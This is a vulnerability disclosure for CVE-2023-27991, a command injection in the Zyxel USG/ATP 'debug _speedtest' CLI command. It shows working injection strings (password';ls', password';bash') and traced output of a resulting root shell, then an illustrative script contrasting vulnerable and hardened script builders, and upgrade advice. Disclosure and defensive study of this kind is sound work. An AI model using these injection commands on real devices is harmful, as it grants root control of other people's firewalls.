ZYXEL USG/ATP Series - ROOT SHELL by CLI command injection (CVE-2023-27991)
root shell from web-console (ZLD V4.30~V5.35)

This report describes a critical post-authentication vulnerability (CVE-2023-27991) in the Zyxel USG/ATP command-line interface: an admin or limited-admin user can spawn a root shell through the hidden "speedtest" debug command.

The command runs a script, /tmp/speedtest.sh, and the values given as command parameters are written into the text of that script without any escaping. A parameter value that contains a single quote therefore closes the assignment the script intends, and whatever follows it is parsed and executed as a shell command.

For example, running the speedtest command with the "host", "user", "password" and "interface" parameters executes the generated /tmp/speedtest.sh.

The following output shows that execution (the script runs with shell tracing, so each command is echoed with a leading "+"); the FTP fetch and the php stage fail only because the redacted host does not resolve:

Router# debug _speedtest host REDACTED user REDACTED password REDACTED interface eth1 speedtest-host REDACTED
+ host=REDACTED
+ id=REDACTED
+ pw=REDACTED
+ basedir=/tmp/
+ pwd
/db/etc/zyxel/ftp
+ remodir=/zyxel/x86/
+ filename=speedtest.tar.bz2
+ cd /tmp/
+ ftp -n REDACTED
ftp: REDACTED: Name or service not known
Not connected.
Not connected.
Not connected.
Not connected.
+ tar -jxvf /tmp/speedtest.tar.bz2 -C /tmp/
tar (child): /tmp/speedtest.tar.bz2: Cannot open: No such file or directory
tar (child): Error is not recoverable: exiting now
tar: Child returned status 2
tar: Error is not recoverable: exiting now
+ rm -f /tmp/speedtest.tar.bz2
+ cd /tmp/speedtest
+ pwd
/tmp/speedtest
+ LD_LIBRARY_PATH=/tmp/speedtest
+ ./php speedtest.php
/tmp/speedtest.sh: line 22: ./php: No such file or directory
Router>

However, injecting into the "password" parameter lets an authenticated user execute arbitrary commands on the device.

For instance, appending ';ls' to the "password" value closes the single-quoted assignment in the script and runs ls. The listing is of the script's working directory at that point, which the pwd immediately afterwards shows to be /db/etc/zyxel/ftp (the cd /tmp/ only happens later):

Router> debug _speedtest host REDACTED user REDACTED password REDACTED';ls' interface eth1 speedtest-host REDACTED
+ host=REDACTED
+ id=REDACTED
+ pw=REDACTED
+ ls
3G_patch_file.wwan_decryption  cdr              dev              ip_reputation        packet_trace       tr069
anti_botnet                    cert             diaginfo_script  language             script             twofa
app_patrol                     conf             firmware1        latest_version       standby_conf       wtp_image
av                             current_version  firmware2        latest_version.test  system_protection
av_ct                          debug            idp              liso                 tmp
+ basedir=/tmp/
+ pwd
/db/etc/zyxel/ftp
+ remodir=/zyxel/x86/
+ filename=speedtest.tar.bz2
+ cd /tmp/
+ ftp -n REDACTED
ftp: REDACTED: Name or service not known
Not connected.
Not connected.
Not connected.
Not connected.
+ tar -jxvf /tmp/speedtest.tar.bz2 -C /tmp/
tar (child): /tmp/speedtest.tar.bz2: Cannot open: No such file or directory
tar (child): Error is not recoverable: exiting now
tar: Child returned status 2
tar: Error is not recoverable: exiting now
+ rm -f /tmp/speedtest.tar.bz2
+ cd /tmp/speedtest
+ pwd
/tmp/speedtest
+ LD_LIBRARY_PATH=/tmp/speedtest
+ ./php speedtest.php
/tmp/speedtest.sh: line 22: ./php: No such file or directory
Router>

Finally, injecting "bash" through the same parameter spawns an interactive shell, and the id output confirms it runs as root (uid=0):

Username: rain
Password:
Router# debug _speedtest host REDACTED user REDACTED password REDACTED';bash' interface eth1 speedtest-host REDACTED
+ host=REDACTED
+ id=REDACTED
+ pw=REDACTED
+ bash
bash-5.1# id; uname -a; cat /rw/fwversion
uid=0(root) gid=10000(operator) groups=0(root),10000(operator)
Linux ATP100-LABTEST04-R41N 3.10.87-rt80-Cavium-Octeon 2 SMP Fri Dec 23 04:07:52 CST 2022 mips64 Cavium Octeon III V0.2 FPU V0.0 ROUTER7000_REF (CN7020p1.2-1200-AAP) GNU/Linux
KERNEL_VERSION=3.10.87
FIRMWARE_VER=5.35(ABPS.0)
CAPWAP_VER=1.00.04
COMPATIBLE_PRODUCT_MODEL_0=E153
COMPATIBLE_PRODUCT_MODEL_1=E17F
COMPATIBLE_PRODUCT_MODEL_2=FFFF
COMPATIBLE_PRODUCT_MODEL_3=FFFF
COMPATIBLE_PRODUCT_MODEL_4=FFFF
MODEL_ID=ATP100
KERNEL_BUILD_DATE=2022-12-23 04:08:09
BUILD_DATE=2022-12-23 04:42:07
FSH_VER=1.0.0
bash-5.1#
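The three traces above all come down to one defect: the CLI writes the parameter values into the text of /tmp/speedtest.sh, so a value containing a single quote closes the pw='...' literal and the rest of the value is executed as a command. The script below is an added example written for this page, not code from the advisory or from Zyxel's firmware. It models the defect with a hypothetical script builder (the template, the function names, the INJECTED_MARKER payload and the example host are all assumptions) and puts a hardened builder beside it that allowlists fields with a fixed shape (host, user) and shell-quotes the free-form password field. Each generated script is run in a child shell, as the device runs its own, and the result string shows whether the injected command executed.

```shell
# Added example (not from the advisory or Zyxel's code): a minimal model of a
# CLI front-end that pastes its arguments into a shell script template, which
# is the bug class behind CVE-2023-27991. The template, function names and the
# marker payload are assumptions made for this illustration.

# Vulnerable builder: values are spliced into single-quoted assignments. A
# single quote inside a value ends the literal; the remainder becomes shell code.
build_script_vulnerable() {
    local host=$1 user=$2 password=$3
    cat <<EOF
host='$host'
id='$user'
pw='$password'
basedir=/tmp/
echo "would connect to \$host as \$id"
EOF
}

# Hardened builder, two fixes:
#  1. fields with a known shape (hostname, user/interface name) are allowlisted;
#  2. free-form fields (password) are shell-quoted before being spliced in,
#     so an embedded ' can no longer close the literal.
shell_quote() {
    # Emit 'value' with every embedded ' rewritten as '\'' (close, escaped quote, reopen).
    # sed consumes \\ as one literal backslash, so the replacement is exactly '\''.
    printf "'%s'" "$(printf '%s' "$1" | sed "s/'/'\\\\''/g")"
}

is_safe_token() {
    # Letters, digits, dot, dash and underscore only; reject empty values.
    case "$1" in
        ''|*[!A-Za-z0-9._-]*) return 1 ;;
        *) return 0 ;;
    esac
}

build_script_hardened() {
    is_safe_token "$1" || { echo "rejected host: $1" >&2; return 1; }
    is_safe_token "$2" || { echo "rejected user: $2" >&2; return 1; }
    local host user password
    host=$(shell_quote "$1")
    user=$(shell_quote "$2")
    password=$(shell_quote "$3")
    cat <<EOF
host=$host
id=$user
pw=$password
basedir=/tmp/
echo "would connect to \$host as \$id"
EOF
}

# Run a generated script (read from stdin) in a child bash and report whether
# the injected marker command executed. Prints "injected" or "clean".
run_and_check() {
    local marker=$1 script out
    script=$(cat)
    out=$(bash -c "$script" 2>/dev/null)
    case "$out" in
        *"$marker"*) echo injected ;;
        *) echo clean ;;
    esac
}

# Constructed payload with the same shape as the page's password';ls', but a
# harmless echo instead of ls so the effect is visible in the captured output.
PAYLOAD="secret';echo INJECTED_MARKER'"

vuln_result=$(build_script_vulnerable ftp.example.test rain "$PAYLOAD" | run_and_check INJECTED_MARKER)
safe_result=$(build_script_hardened  ftp.example.test rain "$PAYLOAD" | run_and_check INJECTED_MARKER)
echo "vulnerable builder: $vuln_result"   # injected
echo "hardened builder:   $safe_result"   # clean
```

Passing the values through the environment (exporting them and having the script read "$pw") instead of splicing them into the script text removes the quoting problem entirely; the quoting fix is shown because it is the smallest change to a template that already exists. The allowlist alone would not help for the password field, which may legitimately contain any character, which is why both defences are needed.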

Zyxel has fixed the vulnerability (CVE-2023-27991) in ZLD V5.36. The affected versions are ZLD V4.30 through V5.35.

It is highly recommended that users upgrade to the latest version of the software as soon as possible to ensure the security of their device.


Alessandro Sgreccia
